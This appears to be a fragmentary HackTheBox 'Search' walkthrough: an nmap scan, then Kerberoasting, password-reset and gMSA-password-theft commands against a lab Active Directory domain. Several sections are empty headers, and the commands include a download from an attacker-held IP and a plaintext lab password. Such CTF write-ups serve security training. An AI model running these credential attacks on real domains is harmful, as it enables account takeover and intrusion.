HackTheBox-Search

NMAP

PORT      STATE SERVICE       VERSION            
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-19 09:28:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 10.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8172/tcp open ssl/http Microsoft IIS httpd 10.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49699/tcp open unknown
49725/tcp open msrpc Microsoft Windows RPC

PORT 139/445 (SMB)

PORT 80 (HTTP)

Foothold

python3 /opt/impacket/examples/GetUserSPNs.py  -target-domain search.htb -request -dc-ip 10.129.247.201 -usersfile new_users.txt search.htb/hope.sharp
python3 /opt/impacket/examples/GetUserSPNs.py -request -dc-ip 10.129.247.201 search.htb/hope.sharp
:"IsolationIsKey?" -outputfile hashes.kerberoast

Privilege Escalate (Edgar.Jacobs)

Privilege Escalation (Sierra.Frye)

</sheetData><sheetProtection algorithmName="SHA-512" hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg==" saltValue="U9oZfaVCkz5jWdhs9AA8nA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

Privilege Escalation (Tristan.Davies -> Administrator)

Method 1 (un-intended)

Method 2 (intended)

setuserinfo2 Tristan.Davies 23 'arzismol'

Method 3

Invoke-WebRequest -Uri http://ip/dsinterals.zip -UseBasicParsing -OutFile
Expand-Archive -Path dsinternals.zip -DestinationPath dsinternals
Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA$' -Properties PrincipalsAllowedToRetrieveManagedPassword
$Credential = New-Object System.Management.Automation.PSCredential BIR-ADFS-GMSA$,$pt.SecureCurrentPassword
Invoke-Command -Computer Research -Credential $Credential -ScriptBlock { whoami}
Invoke-Command -Computer Research -Credential $Credential -ScriptBlock { net user Tristan.Davies arzissmol }

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store